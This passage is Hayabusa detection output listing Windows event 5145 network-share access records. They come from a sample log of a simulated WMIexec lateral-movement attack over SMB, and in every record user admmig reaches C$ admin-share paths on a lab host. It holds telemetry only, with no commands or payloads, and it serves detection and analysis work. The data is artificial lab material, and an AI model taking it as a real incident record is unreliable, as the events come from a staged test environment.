10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.426 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 